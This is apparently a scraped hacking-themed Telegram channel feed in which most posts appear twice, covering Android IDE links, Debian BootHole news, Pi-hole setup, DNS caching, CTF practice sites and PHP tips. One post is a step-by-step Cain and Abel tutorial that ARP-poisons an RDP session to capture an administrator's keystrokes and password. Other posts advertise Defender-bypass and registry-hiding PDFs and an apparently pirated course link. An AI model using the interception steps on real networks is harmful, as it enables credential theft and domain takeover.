β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦BEST 2020 IDE ANDROID APPS :
> https://apkpure.com/dcoder-compiler-ide-code-programming-on-mobile/com.paprbit.dcoder
> https://play.google.com/store/apps/details?id=ch.tanapro.JavaIDEdroid
> https://play.google.com/store/apps/details?id=air.JavaEditor
> https://play.google.com/store/apps/details?id=com.aor.droidedit&feature=also_installed
>https://play.google.com/store/apps/details?id=com.paprbit.dcoder
>https://play.google.com/store/apps/details?id=twig.nguyen.codepeeker.pro
> https://play.google.com/store/apps/details?id=com.aide.ui
> https://play.google.com/store/apps/details?id=com.majosoft.anacode
> https://play.google.com/store/apps/details?id=com.henrythompson.quoda
> https://play.google.com/store/apps/details?id=com.duy.compiler.javanide
ENJOYβ€οΈππ»
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦BEST 2020 IDE ANDROID APPS :
> https://apkpure.com/dcoder-compiler-ide-code-programming-on-mobile/com.paprbit.dcoder
> https://play.google.com/store/apps/details?id=ch.tanapro.JavaIDEdroid
> https://play.google.com/store/apps/details?id=air.JavaEditor
> https://play.google.com/store/apps/details?id=com.aor.droidedit&feature=also_installed
>https://play.google.com/store/apps/details?id=com.paprbit.dcoder
>https://play.google.com/store/apps/details?id=twig.nguyen.codepeeker.pro
> https://play.google.com/store/apps/details?id=com.aide.ui
> https://play.google.com/store/apps/details?id=com.majosoft.anacode
> https://play.google.com/store/apps/details?id=com.henrythompson.quoda
> https://play.google.com/store/apps/details?id=com.duy.compiler.javanide
ENJOYβ€οΈππ»
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
APKPure.com
Dcoder, Compiler IDE :Code & Programming on mobile for Android - APK Download
Download Dcoder, Compiler IDE :Code & Programming on mobile apk 4.0.178 for Android. Dcoder compiler: a mobile coding IDE to build projects, code & learn algorithms
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Debian 10.5 released, fixing the "BootHole" security vulnerability :
βͺοΈnews
> Debian 10.5 has been released. This is the fifth stable update of Debian 10 "Buster", which fixes some security issues and bugs.
βͺοΈVulnerability :
One of the most noteworthy is that this version provides the necessary patches to solve the recent GRUB2 UEFI SecureBoot "BootHole" security vulnerability. Therefore, BootHole should be able to be resolved in Debian 10.5, and there will be no startup problems that still plagued some RHEL/CentOS users after mitigating the vulnerability.
βͺοΈFix :
In addition to solving the BootHole problem, Debian 10.5 also updated the ClamAV antivirus software, file-roller security fixes and other minor fixes, used encrypted Debian signature keys for fwupdate and other software packages, and repaired HTTPS support in Jigdo Issues, upgrade Linux 4.19 kernel support, fix multiple cross-site scripting issues in PHP Horde, and multiple other fixes.
βͺοΈdetails & download :
For details, please check https://www.debian.org/News/2020/20200801 to
download the list of mirror sites https://www.debian.org/mirror/list
#News
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Debian 10.5 released, fixing the "BootHole" security vulnerability :
βͺοΈnews
> Debian 10.5 has been released. This is the fifth stable update of Debian 10 "Buster", which fixes some security issues and bugs.
βͺοΈVulnerability :
One of the most noteworthy is that this version provides the necessary patches to solve the recent GRUB2 UEFI SecureBoot "BootHole" security vulnerability. Therefore, BootHole should be able to be resolved in Debian 10.5, and there will be no startup problems that still plagued some RHEL/CentOS users after mitigating the vulnerability.
βͺοΈFix :
In addition to solving the BootHole problem, Debian 10.5 also updated the ClamAV antivirus software, file-roller security fixes and other minor fixes, used encrypted Debian signature keys for fwupdate and other software packages, and repaired HTTPS support in Jigdo Issues, upgrade Linux 4.19 kernel support, fix multiple cross-site scripting issues in PHP Horde, and multiple other fixes.
βͺοΈdetails & download :
For details, please check https://www.debian.org/News/2020/20200801 to
download the list of mirror sites https://www.debian.org/mirror/list
#News
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from Backup Legal Mega
π¦Feeling your windows slow?
> Pluralsight - Optimizing Consumption Strategy in Microsoft Azure updated 2020
https://mega.nz/folder/ykEVUKxI#uzsauHyvtPKD4GRw_sD_Kw
> Pluralsight - Optimizing Consumption Strategy in Microsoft Azure updated 2020
https://mega.nz/folder/ykEVUKxI#uzsauHyvtPKD4GRw_sD_Kw
mega.nz
402.37 MB folder on MEGA
43 files and 14 subfolders
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Enable RDP Server on a One System
1οΈβ£First, we need a system with RDP enabled. If you are using this in your lab, enable one Windows machine's RDP server. Go to Control Panel then System and Security. Below the System section, you will see "Allow remote access". Click there.
2οΈβ£Next, click on the "Allow Remote Assistance connections to this computer" and click "Apply."
3οΈβ£Step 2Install Cain on Windows System
> You should have Cain and Abel installed on your attack system. I have it on my Windows 7 system that I will be using to attack RDP on another Windows 7 system. In this case, we will not be using BackTrack as Cain and Abel is one of the few hacking tools developed originally for Windows and has never been ported to Linux.
4οΈβ£Cain and Abel, besides being a great password cracking tool (albeit a bit slow) is probably the best MiTM tool on the marketβand it is free!
5οΈβ£Step 3Use ARP Scan on Systems with Cain
Now that we have Cain and Abel running on our attack system and RDP server enabled on another, we need to do an ARP scan. In this way, we will find all the systems on the network by sending out ARP requests and the systems on the network will respond with their IP address and MAC addresses. Choose a range that is appropriate for your target network.
6οΈβ£Step 4ARP Poison
Next, now that know all the machines, IP addresses and MAC addresses on the network from the ARP scan, we are in a position to be able to poison the ARP. We poison the ARP so that our attack system sits between the RDP server and the RDP client. In this way, all of either machine's traffic must travel through our attack machine.
7οΈβ£Click on the Sniffer button on Cain, then select the Sniffer tab, then select the Hosts tab at the bottom, then click on the blue + on the top menu, select the Radio button, select the target IP range, and click OK.
8οΈβ£Step 5Choose the Server and Client You Want to Poison
Select the APR button at the bottom next to the hosts tab you used above, press the blue + button, select the targets, and press OK.
9οΈβ£Step 6Connect RDP Client to the RDP Server
Now, we wait for the RDP client to connect to the RDP server. This is likely to happen when an individual calls tech support and tech support needs to configure and demonstrate something on their machine. As you might guess, this requires some patience. When they do, we can then intercept its traffic.
π Step 7Intercept Traffic
With our Cain and Abel MiTM attack in place, all of the traffic between the RDP server and the RDP client will pass through our attack system.
1οΈβ£1οΈβ£Cain and Abel is now capturing the entire session and saving it into a file named in the far right column. We can now right click on that filename and choose View to open the decrypted file in Notepad.
1οΈβ£2οΈβ£Step 8Search for Traffic
Now that all the traffic on the RDP connect is traveling through our attack system, we can search for traffic of interest to us.
1οΈβ£3οΈβ£Ideally, we want the sysadmin password for RDP. If we can find the sysadmin password for RDP, we will likely be able to use RDP on any of the network's machines as usually the sysadmin will set up RDP with the same password on every system for convenience.
1οΈβ£4οΈβ£Even better, many sysadmin use the same password to remote into client machines as they use on their system and other accounts. This means that when we capture this password we may own the entire domain and network!
1οΈβ£5οΈβ£To find any keys pressed in the hexadecimal file capture, use the Find feature in Notepad to search for "key pressed". This will find each of the keystrokes, one-by-one, of any keystrokes entered by the sysadmin including their password. This is tedious work, but you will be rewarded with a pot-of-gold for your patience!
enjoyβ€οΈππ»
wiki source
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Enable RDP Server on a One System
1οΈβ£First, we need a system with RDP enabled. If you are using this in your lab, enable one Windows machine's RDP server. Go to Control Panel then System and Security. Below the System section, you will see "Allow remote access". Click there.
2οΈβ£Next, click on the "Allow Remote Assistance connections to this computer" and click "Apply."
3οΈβ£Step 2Install Cain on Windows System
> You should have Cain and Abel installed on your attack system. I have it on my Windows 7 system that I will be using to attack RDP on another Windows 7 system. In this case, we will not be using BackTrack as Cain and Abel is one of the few hacking tools developed originally for Windows and has never been ported to Linux.
4οΈβ£Cain and Abel, besides being a great password cracking tool (albeit a bit slow) is probably the best MiTM tool on the marketβand it is free!
5οΈβ£Step 3Use ARP Scan on Systems with Cain
Now that we have Cain and Abel running on our attack system and RDP server enabled on another, we need to do an ARP scan. In this way, we will find all the systems on the network by sending out ARP requests and the systems on the network will respond with their IP address and MAC addresses. Choose a range that is appropriate for your target network.
6οΈβ£Step 4ARP Poison
Next, now that know all the machines, IP addresses and MAC addresses on the network from the ARP scan, we are in a position to be able to poison the ARP. We poison the ARP so that our attack system sits between the RDP server and the RDP client. In this way, all of either machine's traffic must travel through our attack machine.
7οΈβ£Click on the Sniffer button on Cain, then select the Sniffer tab, then select the Hosts tab at the bottom, then click on the blue + on the top menu, select the Radio button, select the target IP range, and click OK.
8οΈβ£Step 5Choose the Server and Client You Want to Poison
Select the APR button at the bottom next to the hosts tab you used above, press the blue + button, select the targets, and press OK.
9οΈβ£Step 6Connect RDP Client to the RDP Server
Now, we wait for the RDP client to connect to the RDP server. This is likely to happen when an individual calls tech support and tech support needs to configure and demonstrate something on their machine. As you might guess, this requires some patience. When they do, we can then intercept its traffic.
π Step 7Intercept Traffic
With our Cain and Abel MiTM attack in place, all of the traffic between the RDP server and the RDP client will pass through our attack system.
1οΈβ£1οΈβ£Cain and Abel is now capturing the entire session and saving it into a file named in the far right column. We can now right click on that filename and choose View to open the decrypted file in Notepad.
1οΈβ£2οΈβ£Step 8Search for Traffic
Now that all the traffic on the RDP connect is traveling through our attack system, we can search for traffic of interest to us.
1οΈβ£3οΈβ£Ideally, we want the sysadmin password for RDP. If we can find the sysadmin password for RDP, we will likely be able to use RDP on any of the network's machines as usually the sysadmin will set up RDP with the same password on every system for convenience.
1οΈβ£4οΈβ£Even better, many sysadmin use the same password to remote into client machines as they use on their system and other accounts. This means that when we capture this password we may own the entire domain and network!
1οΈβ£5οΈβ£To find any keys pressed in the hexadecimal file capture, use the Find feature in Notepad to search for "key pressed". This will find each of the keystrokes, one-by-one, of any keystrokes entered by the sysadmin including their password. This is tedious work, but you will be rewarded with a pot-of-gold for your patience!
enjoyβ€οΈππ»
wiki source
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦2020 UPDATE The Pi-hole is a DNS sinkhole that protects your devices from unwanted content, without installing any client-side software.
-A sinkhole is a standard DNS server that has been configured to hand out non-routable addresses for all domains in the sinkhole, so that every computer that uses it will fail to get access to the real site.[2] The higher up the DNS resolution chain the sinkhole is, the more requests it will block as it will supply answers to a greater number of lower NS servers that in turn will serve a greater number of clients. Some of the larger botnets have been made unusable by TLD sinkholes that span the entire Internet.[3] DNS Sinkholes are effective at detecting and blocking malicious traffic, and are used to combat bots and other unwanted traffic.
π¦ F E T U R E S :
> Easy-to-install: our versatile installer walks you through the process, and takes less than ten minutes
> Resolute: content is blocked in non-browser locations, such as ad-laden mobile apps and smart TVs
> Responsive: seamlessly speeds up the feel of everyday browsing by caching DNS queries
> Lightweight: runs smoothly with minimal hardware and software requirements
> Robust: a command line interface that is quality assured for interoperability
> Insightful: a beautiful responsive Web Interface dashboard to view and control your Pi-hole
> Versatile: can optionally function as a DHCP server, ensuring all your devices are protected automatically
> Scalable: capable of handling hundreds of millions of queries when installed on server-grade hardware
> Modern: blocks ads over both IPv4 and IPv6
> Free: open source software which helps ensure you are the sole person in control of your privacy
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
Method 1: Clone our repository and run
1) git clone --depth 1 https://github.com/pi-hole/pi-hole.git Pi-hole
2) cd "Pi-hole/automated install/"
3) sudo bash basic-install.sh
Method 2: Manually download the installer and run
1) wget -O basic-install.sh https://install.pi-hole.net
2) sudo bash basic-install.sh
4) for access dashboard:
> http://pi.hole/admin/ (when using Pi-hole as your DNS server)
> http://<IP_ADDPRESS_OF_YOUR_PI_HOLE>/admin/
> http://pi.hole/ (when using Pi-hole as your DNS server)
E N J O Y β€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦2020 UPDATE The Pi-hole is a DNS sinkhole that protects your devices from unwanted content, without installing any client-side software.
-A sinkhole is a standard DNS server that has been configured to hand out non-routable addresses for all domains in the sinkhole, so that every computer that uses it will fail to get access to the real site.[2] The higher up the DNS resolution chain the sinkhole is, the more requests it will block as it will supply answers to a greater number of lower NS servers that in turn will serve a greater number of clients. Some of the larger botnets have been made unusable by TLD sinkholes that span the entire Internet.[3] DNS Sinkholes are effective at detecting and blocking malicious traffic, and are used to combat bots and other unwanted traffic.
π¦ F E T U R E S :
> Easy-to-install: our versatile installer walks you through the process, and takes less than ten minutes
> Resolute: content is blocked in non-browser locations, such as ad-laden mobile apps and smart TVs
> Responsive: seamlessly speeds up the feel of everyday browsing by caching DNS queries
> Lightweight: runs smoothly with minimal hardware and software requirements
> Robust: a command line interface that is quality assured for interoperability
> Insightful: a beautiful responsive Web Interface dashboard to view and control your Pi-hole
> Versatile: can optionally function as a DHCP server, ensuring all your devices are protected automatically
> Scalable: capable of handling hundreds of millions of queries when installed on server-grade hardware
> Modern: blocks ads over both IPv4 and IPv6
> Free: open source software which helps ensure you are the sole person in control of your privacy
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
Method 1: Clone our repository and run
1) git clone --depth 1 https://github.com/pi-hole/pi-hole.git Pi-hole
2) cd "Pi-hole/automated install/"
3) sudo bash basic-install.sh
Method 2: Manually download the installer and run
1) wget -O basic-install.sh https://install.pi-hole.net
2) sudo bash basic-install.sh
4) for access dashboard:
> http://pi.hole/admin/ (when using Pi-hole as your DNS server)
> http://<IP_ADDPRESS_OF_YOUR_PI_HOLE>/admin/
> http://pi.hole/ (when using Pi-hole as your DNS server)
E N J O Y β€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - pi-hole/pi-hole: A black hole for Internet advertisements
A black hole for Internet advertisements. Contribute to pi-hole/pi-hole development by creating an account on GitHub.
WINDOWS DEFENDE R ATTACK SURFACE R ED U C TI ON RULES BYPASS.pdf
2.4 MB
practical with pictures WINDOWS DEFENDE R ATTACK SURFACE R ED U C TI ON RULES BYPASS
#tutorial
#tutorial
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦SPEEDUP A WEBHOST TIPS
#FaSTtIPS
1) Upgrade Your Web Hosting.
2) Optimize Your Images. ...
3) Do a Plugin Purge. ...
4) Ensure Your Site Scripts Are Up to Date. ...
5) Make Use of CDNs. ...
6) Enable Browser Caching. ...
7) Turn On Gzip Compression. ...
8) Keep CSS files at the Top and Javascript at the Bottom. ...
9) Reduce Http Requests.
10) use cloudflare
11) increase rams
#fastTips
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦SPEEDUP A WEBHOST TIPS
#FaSTtIPS
1) Upgrade Your Web Hosting.
2) Optimize Your Images. ...
3) Do a Plugin Purge. ...
4) Ensure Your Site Scripts Are Up to Date. ...
5) Make Use of CDNs. ...
6) Enable Browser Caching. ...
7) Turn On Gzip Compression. ...
8) Keep CSS files at the Top and Javascript at the Bottom. ...
9) Reduce Http Requests.
10) use cloudflare
11) increase rams
#fastTips
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How does the domain name server know this information?
(1) Cache of domain names
The domain name server that everyone usually uses is called "recursive domain name server" in technical terms. "Recursive server" is for ordinary netizens. The server mentioned in the introduction of "domain name resolution" is the "recursive server".
There is usually a cache of DNS records inside the "recursive server"-this cache is to improve query efficiency. When a computer initiates a domain name query to the recursive server, the recursive server first checks whether there is a record of the domain name in its cache, and if there is, it directly replies the record to the querying computer.
What if the domain name that the other party wants to query is not found? At this time, cache synchronization is necessary.
(2) Cache synchronization
Let's take NetEase's domain name as an example to talk about the processing flow of this situation.
1. The other party queries the domain name 3g.163.com, and the "recursive server" finds that there is no
2. The "recursive server" will first go to the "root domain name server" for help. The "root server" will tell the "recursive server" that this domain name belongs to the branch of com, and you go to the "authoritative server" of the domain name com. The IP address of this authoritative server is xxx.
3. Then the "recursive server" finds the "authoritative server for the com domain name" according to the xxx address it got. "The authoritative server of the com domain name" tells it: you should find the "authoritative server of the 163.com domain name", the IP address of this authoritative server is yyy
4. Then the "recursive server" went to the "authoritative server for the 163.com domain name" again. At this time, "the authoritative server of the 163.com domain name" will tell it what the IP address of the 3g.163.com domain name is.
Did you guys see it? The whole process is like "kicking a ball", and the efficiency is very low. So I mentioned earlier that the "recursive domain name server" must have a cache to optimize efficiency (no need to "kick the ball" for every query).
(3) Synchronization cycle
After talking about the "synchronization of domain names", let me mention the "synchronization cycle" by the way.
Because the domain name information on the Internet is likely to change. For example, a new domain name is added, an old domain name is cancelled, or the IP address corresponding to a certain domain name is changed. Therefore, in the cache retained on the "recursive server", each domain name record has a life cycle (may be a few minutes or a few hours). If the life cycle of a record has passed, it will be deleted and then resynchronized.
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How does the domain name server know this information?
(1) Cache of domain names
The domain name server that everyone usually uses is called "recursive domain name server" in technical terms. "Recursive server" is for ordinary netizens. The server mentioned in the introduction of "domain name resolution" is the "recursive server".
There is usually a cache of DNS records inside the "recursive server"-this cache is to improve query efficiency. When a computer initiates a domain name query to the recursive server, the recursive server first checks whether there is a record of the domain name in its cache, and if there is, it directly replies the record to the querying computer.
What if the domain name that the other party wants to query is not found? At this time, cache synchronization is necessary.
(2) Cache synchronization
Let's take NetEase's domain name as an example to talk about the processing flow of this situation.
1. The other party queries the domain name 3g.163.com, and the "recursive server" finds that there is no
2. The "recursive server" will first go to the "root domain name server" for help. The "root server" will tell the "recursive server" that this domain name belongs to the branch of com, and you go to the "authoritative server" of the domain name com. The IP address of this authoritative server is xxx.
3. Then the "recursive server" finds the "authoritative server for the com domain name" according to the xxx address it got. "The authoritative server of the com domain name" tells it: you should find the "authoritative server of the 163.com domain name", the IP address of this authoritative server is yyy
4. Then the "recursive server" went to the "authoritative server for the 163.com domain name" again. At this time, "the authoritative server of the 163.com domain name" will tell it what the IP address of the 3g.163.com domain name is.
Did you guys see it? The whole process is like "kicking a ball", and the efficiency is very low. So I mentioned earlier that the "recursive domain name server" must have a cache to optimize efficiency (no need to "kick the ball" for every query).
(3) Synchronization cycle
After talking about the "synchronization of domain names", let me mention the "synchronization cycle" by the way.
Because the domain name information on the Internet is likely to change. For example, a new domain name is added, an old domain name is cancelled, or the IP address corresponding to a certain domain name is changed. Therefore, in the cache retained on the "recursive server", each domain name record has a life cycle (may be a few minutes or a few hours). If the life cycle of a record has passed, it will be deleted and then resynchronized.
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦EFSView lists the users who have ordinary decryption keys or recovery keys for an EFS encrypted file.
#fastTips
1) Usage instructions
Download the exe file and run it from the Command Prompt. It will give you the instructions you need.
2) Questions and answers
Q: When I double-click on the file a window comes up and disappears immediately. What's wrong?
A: You must run the file from a Command Prompt.
3) download :
https://vidstromlabs.com/downloads/efsview.exe
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦EFSView lists the users who have ordinary decryption keys or recovery keys for an EFS encrypted file.
#fastTips
1) Usage instructions
Download the exe file and run it from the Command Prompt. It will give you the instructions you need.
2) Questions and answers
Q: When I double-click on the file a window comes up and disappears immediately. What's wrong?
A: You must run the file from a Command Prompt.
3) download :
https://vidstromlabs.com/downloads/efsview.exe
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦2020 YTop sites for practice hacking :
1. CTF365
CTF365 users install and protect their own servers at the same time they attack other users' servers. CTF365 is suitable for security professionals looking to develop offensive skills or system administrators interested in improving their defensive skills. If you're new to the infosec, you can sign up for a free beginner account and get to know it through a few pre-configured vulnerable servers.
2. OVERTHEWIRE
OverTheWire is suitable for everyone who wants to study the theory of information security and apply it in practice, regardless of their experience. Beginners should start with the Bandit-level challenges as they are needed to further other challenges.
3. HACKING-LAB
Hacking-Labs provide CTF challenges for the European Cyber ββSecurity Challenge, but they also host regular competitions on their platform that anyone can participate in. Just register, set up a vpn and choose a task to your liking.
4. PWNABLE.KR
This platform focuses on pwn-like CTF-like tasks, the essence of which is to find, read and send the flag files that are in each task. You must use programming, reverse engineering, or vulnerability exploitation skills to access the contents of the files before you can submit a solution.
Problems are divided into 4 levels of difficulty: easy - for beginners, intermediate, difficult and hardcore, where tasks require non-standard approaches to solve.
5. IO
IO is a wargame from the creators of netgarage.org, a community where like-minded people share knowledge about security, artificial intelligence, VR and more. 3 versions of wargame were created: IO, IO64 and IOarm, of all IO is the most mature. Connect to IO via SSH and you can get to work.
6. SMASHTHESTACK
SmashTheStack consists of 7 different wargames: Amateria, Apfel (currently offline), Blackbox, Blowfish, CTF (currently offline), Logic and Tux. Each wargame contains many tasks, ranging from standard vulnerabilities to reverse engineering tasks.
7. MICROCORRUPTION
Microcorruption is a CTF in which you need to "reverse" the fictional electronic lockitall devices. Lockitall devices protect bonds held in warehouses owned by the fictitious company Cy Yombinator. On the road to stealing bonds, you will learn assembly language, learn how to use the debugger, step through code, set breakpoints, and examine memory.
8. REVERSING.KR
Here you can find 26 challenges to test your hacking and reverse engineering skills. The site has not been updated since the end of 2012, but the tasks in hand are still valuable learning resources.
9. HACK THIS SITE
Hack This Site is a free wargame site to test and improve your hacking skills. We can find many hacking tasks in it in several categories, including basic tasks, realistic tasks, applications, programming, phreaking , JavaScript, forensics , steganography , etc. The site also boasts an active community with a large directory of hacker articles and a forum for discussing security-related issues. It was recently announced that the site's codebase will be overhauled, so big improvements can be expected in the coming months.
10. W3CHALLS
W3Challs is a multi-tasking learning platform in various categories, including hacking, wargaming, forensics, cryptography, steganography, and programming. The goal of the platform is to provide realistic challenges. You get points depending on the complexity of the problem solved. There is also a forum where you can discuss and solve problems with other members.
11. PWN0
The pwn0 site is a VPN where almost anything happens. Fight against bots or users and gain points by gaining control over other systems.
12. EXPLOIT EXERCISES
Exploit Exercises offers a variety of virtual machines, documentation, and tasks that will come in handy in learning privilege escalation, vulnerability analysis, exploit development, debugging, reverse engineering, and more.
π¦2020 YTop sites for practice hacking :
1. CTF365
CTF365 users install and protect their own servers at the same time they attack other users' servers. CTF365 is suitable for security professionals looking to develop offensive skills or system administrators interested in improving their defensive skills. If you're new to the infosec, you can sign up for a free beginner account and get to know it through a few pre-configured vulnerable servers.
2. OVERTHEWIRE
OverTheWire is suitable for everyone who wants to study the theory of information security and apply it in practice, regardless of their experience. Beginners should start with the Bandit-level challenges as they are needed to further other challenges.
3. HACKING-LAB
Hacking-Labs provide CTF challenges for the European Cyber ββSecurity Challenge, but they also host regular competitions on their platform that anyone can participate in. Just register, set up a vpn and choose a task to your liking.
4. PWNABLE.KR
This platform focuses on pwn-like CTF-like tasks, the essence of which is to find, read and send the flag files that are in each task. You must use programming, reverse engineering, or vulnerability exploitation skills to access the contents of the files before you can submit a solution.
Problems are divided into 4 levels of difficulty: easy - for beginners, intermediate, difficult and hardcore, where tasks require non-standard approaches to solve.
5. IO
IO is a wargame from the creators of netgarage.org, a community where like-minded people share knowledge about security, artificial intelligence, VR and more. 3 versions of wargame were created: IO, IO64 and IOarm, of all IO is the most mature. Connect to IO via SSH and you can get to work.
6. SMASHTHESTACK
SmashTheStack consists of 7 different wargames: Amateria, Apfel (currently offline), Blackbox, Blowfish, CTF (currently offline), Logic and Tux. Each wargame contains many tasks, ranging from standard vulnerabilities to reverse engineering tasks.
7. MICROCORRUPTION
Microcorruption is a CTF in which you need to "reverse" the fictional electronic lockitall devices. Lockitall devices protect bonds held in warehouses owned by the fictitious company Cy Yombinator. On the road to stealing bonds, you will learn assembly language, learn how to use the debugger, step through code, set breakpoints, and examine memory.
8. REVERSING.KR
Here you can find 26 challenges to test your hacking and reverse engineering skills. The site has not been updated since the end of 2012, but the tasks in hand are still valuable learning resources.
9. HACK THIS SITE
Hack This Site is a free wargame site to test and improve your hacking skills. We can find many hacking tasks in it in several categories, including basic tasks, realistic tasks, applications, programming, phreaking , JavaScript, forensics , steganography , etc. The site also boasts an active community with a large directory of hacker articles and a forum for discussing security-related issues. It was recently announced that the site's codebase will be overhauled, so big improvements can be expected in the coming months.
10. W3CHALLS
W3Challs is a multi-tasking learning platform in various categories, including hacking, wargaming, forensics, cryptography, steganography, and programming. The goal of the platform is to provide realistic challenges. You get points depending on the complexity of the problem solved. There is also a forum where you can discuss and solve problems with other members.
11. PWN0
The pwn0 site is a VPN where almost anything happens. Fight against bots or users and gain points by gaining control over other systems.
12. EXPLOIT EXERCISES
Exploit Exercises offers a variety of virtual machines, documentation, and tasks that will come in handy in learning privilege escalation, vulnerability analysis, exploit development, debugging, reverse engineering, and more.
13. RINGZER0 TEAM ONLINE CTF
RingZer0 Team Online CTF offers over 200 challenges that will allow you to test your hacking skills in multiple areas - from cryptography, malware analysis to SQL injection , shellcoding, and more. After you have found a solution to the problem, you can send it to RingZer0 Team. If your decision is accepted, you will receive RingZer0Gold, which can be exchanged for hints while solving problems.
14. HELLBOUND HACKERS
On Hellbound Hackers you can find traditional tasks with exploits and such task formats that are not available on other resources. For example, application patching and time-limited tasks. In patching tasks, you are given a vulnerable piece of code and you need to propose a fix for this vulnerability.
15. TRY2HACK
Try2Hack is one of the oldest sites for improving hacking skills and is still afloat. He offers several challenges to keep you entertained. The tasks are varied and become more difficult as you progress.
16. HACK.ME
Hack.me is a large collection of vulnerable web applications for putting your hacking skills into practice. All applications are provided by the community and each can be run on the fly in a secure, isolated sandbox.
17. HACKTHIS !!
HackThis !! consists of 50+ tasks of different levels, for solving each of which you get a certain number of points depending on the difficulty level. Similar to Hack This Site, HackThis !! There is also a lively community, numerous articles and news about hacking, and a forum where you can discuss security-related tasks and issues.
18. ENIGMA GROUP
The Enigma Group contains over 300 tasks with a focus on the top 10 OWASP exploits. The site has nearly 48,000 active members and hosts weekly CTF contests as well as weekly and monthly contests.
19. GOOGLE GRUYERE
Google Gruyere shows you how to exploit vulnerabilities in web applications and how to protect against them. You can do real penetration testing and actually hack a real application using attacks like XSS and XSRF .
20. GAME OF HACKS
Game of Hacks shows you a set of code snippets as a multi-choice quiz, and you must identify the correct vulnerability in the code. This site stands out a bit from this list, but nevertheless it's a good game to spot vulnerabilities in your code.
21. ROOT ME
Root Me offers over 200 challenges and over 50 virtual environments allowing you to practice your hacking skills in a variety of scenarios. This is definitely one of the best sites on this list.
22. CTFTIME
While CTFtime is not a hacking site like the others on this list, it is a great resource to stay up to date with CTF competitions happening around the world. Therefore, if you are interested in joining a CTF team or participating in a competition, you should take a look here.
23. PENTESTERLAB
PentesterLab is an easy and convenient way to learn pentesting . The site provides vulnerable systems that can be used to test and study vulnerabilities. In practice, you can work with real vulnerabilities both online and offline.
E N J O Y β€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
RingZer0 Team Online CTF offers over 200 challenges that will allow you to test your hacking skills in multiple areas - from cryptography, malware analysis to SQL injection , shellcoding, and more. After you have found a solution to the problem, you can send it to RingZer0 Team. If your decision is accepted, you will receive RingZer0Gold, which can be exchanged for hints while solving problems.
14. HELLBOUND HACKERS
On Hellbound Hackers you can find traditional tasks with exploits and such task formats that are not available on other resources. For example, application patching and time-limited tasks. In patching tasks, you are given a vulnerable piece of code and you need to propose a fix for this vulnerability.
15. TRY2HACK
Try2Hack is one of the oldest sites for improving hacking skills and is still afloat. He offers several challenges to keep you entertained. The tasks are varied and become more difficult as you progress.
16. HACK.ME
Hack.me is a large collection of vulnerable web applications for putting your hacking skills into practice. All applications are provided by the community and each can be run on the fly in a secure, isolated sandbox.
17. HACKTHIS !!
HackThis !! consists of 50+ tasks of different levels, for solving each of which you get a certain number of points depending on the difficulty level. Similar to Hack This Site, HackThis !! There is also a lively community, numerous articles and news about hacking, and a forum where you can discuss security-related tasks and issues.
18. ENIGMA GROUP
The Enigma Group contains over 300 tasks with a focus on the top 10 OWASP exploits. The site has nearly 48,000 active members and hosts weekly CTF contests as well as weekly and monthly contests.
19. GOOGLE GRUYERE
Google Gruyere shows you how to exploit vulnerabilities in web applications and how to protect against them. You can do real penetration testing and actually hack a real application using attacks like XSS and XSRF .
20. GAME OF HACKS
Game of Hacks shows you a set of code snippets as a multi-choice quiz, and you must identify the correct vulnerability in the code. This site stands out a bit from this list, but nevertheless it's a good game to spot vulnerabilities in your code.
21. ROOT ME
Root Me offers over 200 challenges and over 50 virtual environments allowing you to practice your hacking skills in a variety of scenarios. This is definitely one of the best sites on this list.
22. CTFTIME
While CTFtime is not a hacking site like the others on this list, it is a great resource to stay up to date with CTF competitions happening around the world. Therefore, if you are interested in joining a CTF team or participating in a competition, you should take a look here.
23. PENTESTERLAB
PentesterLab is an easy and convenient way to learn pentesting . The site provides vulnerable systems that can be used to test and study vulnerabilities. In practice, you can work with real vulnerabilities both online and offline.
E N J O Y β€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
Hiding Registry keys with PSRe ect.pdf
267.1 KB
Hiding Registry keys with PSRe ect #requested
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦why php is important in hacking ?
> What can be done in PHP
According to the official PHP site, you can:
> collect form data (login / password input, etc.);
> create dynamic content on pages;
> send and receive cookies;
> write scripts on the command line;
> execute scripts on the server side;
> develop desktop applications.
> Which companies use PHP
Facebook, Lyft, Mint, Hootsuite, Viber, Buffer, DocuSig
#fastTips
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦why php is important in hacking ?
> What can be done in PHP
According to the official PHP site, you can:
> collect form data (login / password input, etc.);
> create dynamic content on pages;
> send and receive cookies;
> write scripts on the command line;
> execute scripts on the server side;
> develop desktop applications.
> Which companies use PHP
Facebook, Lyft, Mint, Hootsuite, Viber, Buffer, DocuSig
#fastTips
